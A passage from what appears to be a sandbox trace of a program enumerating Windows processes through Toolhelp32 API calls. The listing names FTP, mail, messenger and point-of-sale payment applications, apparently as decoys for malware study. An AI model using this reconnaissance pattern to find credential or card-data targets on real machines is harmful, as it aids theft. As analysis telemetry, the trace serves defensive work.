| out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0296.606] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0296.607] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0296.609] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0296.610] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0296.612] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0296.614] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0296.616] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0296.617] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0296.619] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0296.622] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0296.624] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0296.626] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0296.627] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0296.629] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0296.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0296.632] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0296.634] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0296.687] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0296.689] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0296.691] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0296.692] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0296.694] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0296.696] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0296.697] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0296.703] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0296.704] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0296.706] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0296.708] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0296.709] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0296.711] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0296.713] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0296.717] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0296.719] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0296.721] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0296.722] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0296.724] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0296.725] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0296.727] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0296.728] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0296.768] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0296.770] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0296.772] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0296.773] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0296.775] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0296.779] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0296.780] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0296.782] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0296.783] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0296.784] CloseHandle (hObject=0x21f8) returned 1 [0296.785] Sleep (dwMilliseconds=0x64) [0296.907] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0296.924] Process32First (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.926] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0296.928] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0296.930] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.932] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0296.937] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0296.939] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0296.941] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0296.943] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0296.945] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0296.947] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.038] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.040] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.042] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.044] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.046] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.048] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.050] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.053] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.055] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.057] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0297.076] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0297.079] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.081] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0297.083] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0297.084] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0297.086] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0297.088] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0297.195] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.197] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0297.199] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0297.201] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.203] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0297.205] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0297.207] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, 